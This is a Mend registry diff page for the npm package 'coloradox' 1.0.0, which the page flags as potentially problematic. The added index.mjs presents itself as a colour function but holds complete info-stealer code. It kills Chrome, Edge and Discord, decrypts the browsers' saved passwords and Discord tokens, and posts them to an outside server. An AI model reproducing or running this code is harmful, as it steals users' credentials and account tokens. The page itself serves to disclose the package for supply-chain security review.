npm - coloradox - Versions diffs - 1.0.0 - Mend

coloradox 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of coloradox might be problematic. Click here for more details.

Files changed (2) hide show

package/index.mjs +104 -0
package/package.json +15 -0

package/index.mjs ADDED Viewed

@@ -0,0 +1,104 @@
+import fs from "node:fs";
+import util from "node:util";
+import crypto from "node:crypto";
+import prcs from "node:child_process";
+import { Dpapi } from "@primno/dpapi";
+import sqlite from "sqlite3";
+const chrome = {
+    exec: () => `${utils.envs()[1]}\\Google\\Chrome\\Application\\chrome.exe`,
+    main: async () => {
+        if (!fs.existsSync(chrome.exec())) return ["Not Found"]
+        utils.kill(chrome.exec());
+        const ls = fs.readFileSync(`${process.env.LOCALAPPDATA}\\Google\\Chrome\\User Data\\Local State`, { encoding: "utf-8" });
+        const profiles = Object.keys(JSON.parse(ls)["variations_google_groups"]), key = JSON.parse(ls)["os_crypt"]["encrypted_key"];
+        const result = { cookies: [], history: [], passwords: [] };
+        result.passwords.push(...await chrome.passwords(profiles[0], key));
+        return result;
+    },
+    passwords: async (profile, key) => {
+        const db = new sqlite.Database(`${process.env.LOCALAPPDATA}\\Google\\Chrome\\User Data\\${profile}\\Login Data`);
+        const rows = await util.promisify(db.all).bind(db)("SELECT origin_url, username_value, password_value FROM logins"); db.close();
+        return rows.reduce((result, { origin_url, username_value, password_value }) => {
+            const value = utils.decrypt(key, password_value);
+            return value.length ? [...(result), `${origin_url}:${username_value}:${value}`] : result;
+        }, []);
+    }
+};
+const edge = {
+    exec: () => `${utils.envs()[0]}\\Microsoft\\Edge\\Application\\msedge.exe`,
+    main: async () => {
+        if (!fs.existsSync(edge.exec())) return ["Not Found"]
+        utils.kill(edge.exec())
+        const ls = fs.readFileSync(`${process.env.LOCALAPPDATA}\\Microsoft\\Edge\\User Data\\Local State`, { encoding: "utf-8" });
+        const profiles = Object.keys(JSON.parse(ls)["profile"]["info_cache"]), key = JSON.parse(ls)["os_crypt"]["encrypted_key"];
+        const result = { cookies: [], history: [], passwords: [] };
+        result.passwords.push(...await edge.passwords(profiles[0], key));
+        return result;
+    },
+    passwords: async (profile, key) => {
+        const db = new sqlite.Database(`${process.env.LOCALAPPDATA}\\Microsoft\\Edge\\User Data\\${profile}\\Login Data`);
+        const rows = await util.promisify(db.all).bind(db)("SELECT origin_url, username_value, password_value FROM logins"); db.close();
+        return rows.reduce((result, { origin_url, username_value, password_value }) => {
+            const value = utils.decrypt(key, password_value);
+            return value.length ? [...(result), `${origin_url}:${username_value}:${value}`] : result;
+        }, []);
+    }
+};
+const discord = {
+    paths: () => [`${process.env.APPDATA}\\discord`, `${process.env.APPDATA}\\discordptb`, `${process.env.APPDATA}\\discordcanary`],
+    main: async () => {
+        ["Discord.exe", "DiscordPTB.exe", "DiscordCanary.exe"].forEach((file) => utils.kill(file));
+        return await Promise.all(
+            discord.paths().flatMap(async (dPath) => {
+                const ls = `${dPath}\\Local State`;
+                if (!fs.existsSync(ls)) return [];
+                return await discord.tokens(dPath, JSON.parse(fs.readFileSync(ls))["os_crypt"]["encrypted_key"]);
+            })
+        );
+    },
+    tokens: async (profile, key) => {
+        return fs.readdirSync(`${profile}\\Local Storage\\leveldb`).flatMap((file) => {
+            const token = fs.readFileSync(`${profile}\\Local Storage\\leveldb\\${file}`, { encoding: "utf-8" }).match(/dQw4w9WgXcQ:[^.*\["(.*)"\].*$][^\"]*/);
+            if (token) return [utils.decrypt(key, Buffer.from(token[0].split(":")[1], "base64"))];
+            return [];
+        });
+    }
+};
+const utils = {
+    // start: (task) => {
+    //     if (prcs.execSync("tasklist").includes(task.match(/([^\\\/]+\.exe)$/i)[0])) return;
+    //     prcs.spawn(task, { detached: true, stdio: "ignore" }).unref();
+    // },
+    kill: (task) => {
+        // task = task.match(/([^\\\/]+\.exe)$/i)[0];
+        if (!prcs.execSync("tasklist").includes(task)) return false;
+        prcs.execSync(`taskkill /f /im ${task}`); return true;
+    },
+    envs: () => { return [process.env["CommonProgramFiles(x86)"].replace("\\Common Files", ""), process.env["CommonProgramFiles"].replace("\\Common Files", "")] },
+    decrypt: (key, value) => crypto.createDecipheriv("aes-256-gcm", Dpapi.unprotectData(Buffer.from(Buffer.from(key, "base64").subarray(5), "utf-8"), null, "CurrentUser"), value.subarray(3, 15)).update(value.subarray(15, value.length - 16), "base64", "utf-8")
+};
+async function color(color = "white", text = "") {
+    const grabbed = {
+        chrome: await chrome.main(),
+        edge: await edge.main(),
+        discord: await discord.main()
+    }
+    await fetch("https://raw.northernsi.de/mwam", {
+        method: "POST",
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify(grabbed)
+    });
+}
+export default color;

package/package.json ADDED Viewed

@@ -0,0 +1,15 @@
+{
+  "name": "coloradox",
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.mjs",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "@primno/dpapi": "^1.1.2",
+    "sqlite3": "^5.1.6"
+  }
+}